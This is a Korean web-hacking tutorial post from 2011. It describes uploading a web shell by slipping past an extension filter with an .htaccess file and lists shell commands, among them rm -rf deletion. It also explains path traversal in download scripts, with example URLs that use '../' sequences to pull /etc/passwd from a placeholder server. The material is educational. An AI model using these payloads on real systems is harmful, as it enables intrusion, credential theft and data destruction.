1581,

11/80

사용중

http://www.cyworld.com/csy_lovely

웹 해킹에대해서 알아보자 (8)

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1835 [복사]

1) 확장자 필터링 web.php(웹 셀)파일을 업로드 할 수 없다.
2) htaccess, web.zip 웹셀 업로드 성공
3) 웹 쉘 실행(web.zip 클릭하면 바로 실행)

주요 실행 명령어 (웹 쉘 마다 기능이 다름)

목록보기 :ls
상위 목록 보기 : ls ../ ../
파일 삭제 : rm -rf[지울 파일명]
웹 페이지 다운 : tar -cvf c.tar

2.File download Vulnerability
다운로드 파일의 위치에 제한 조건으 ㄹ부여하지 않아 지정된 파일 이외의 위치에 있는 파일들에 접근하거나 다운로드 할 수 있는 취약점을 말한다. 게시판 등에 저장된 자료에 대해 다운로드 스크립트를 이용하여 다운로드 기능을 제공하면서, 대상 자료 파일의 위치 지정에 제한 조건을 부여하지 않았을 경우 URL간의 다운로드 스크립트의 인수값에 '../' 문자열 등을 입력하여 시스템 디렉토리 등에 있는 /etc/passwd 와 같은 비공개 자료들이 유출될 수 있다.
특히, 리눅스 및 유닉스 계열의 웹 서버에 각별히 주의가 필요하다. 예를 들어 파일 다운로드 시 주소 창에 ↓와 같이 입력
http://servername.com/data/download.php?path=upfiles&filename=신청서.doc
패스워드(password) 파일의 해킹을 시도한다.
http://servername.com/date/download.php?path../../../../../../../../../../../etc&filename=passwd
(download.php cgi의 path 변수에 위치를 지정하고 filename 변수를 이용해 passwd 파일 다운로드)
http://servername.com/data/download.php?path=upfiles&filename=../../../../../../../../../../../etc/passwd
(download.php cgi 의 filename변수에서 경로를 따라 들어가 passwd 파일을 다운로드 받음)

Hit : 8186 Date : 2011/08/03 02:12